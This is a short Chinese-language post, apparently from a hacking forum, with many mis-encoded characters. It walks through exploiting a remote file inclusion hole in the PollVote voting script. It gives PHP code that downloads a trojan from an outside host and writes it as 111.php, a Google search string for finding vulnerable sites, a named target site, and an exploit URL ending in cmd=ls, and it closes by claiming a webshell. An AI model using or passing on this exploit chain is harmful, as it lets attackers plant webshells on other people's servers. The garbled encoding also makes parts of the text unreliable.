PollVote是一個(gè)投票系統(tǒng)，今天看了非安全的雜志，看了利用方法， 

不過(guò)作者說(shuō)利用過(guò)程的時(shí)候很煩瑣，關(guān)鍵的時(shí)候又沒說(shuō)明白， 

簡(jiǎn)單的說(shuō)一下`` 

首先建立2個(gè)文本 分別是creatfile.txt和phpdoor.txt 

creatfile.txt內(nèi)容寫 

<? 
$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt"); 
$ff=fopen("111.php","a"); 
fwrite ($ff,$f); 
fclose($ff); 
?> 

phpdoor.txt內(nèi)容就寫個(gè)PHP木馬 

之后在http://www.google.com 搜索關(guān)鍵詞"pollvote.php?pollname" 

有很多， 
搜索到一個(gè)http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg 


就是他了 

EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls 

這個(gè)就是利用原理了， 
剛才說(shuō)到的creatfile.txt和phpdoor.txt這個(gè)2個(gè)文件都上傳到自己的空間里 

執(zhí)行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt 

這樣 
phpdoor.txt里的內(nèi)容就會(huì)生成一個(gè)111.php 

這樣我們就得到WEBSHELL了 

http://www.skinnyturd.co.uk/poll/111.php  

最新評(píng)論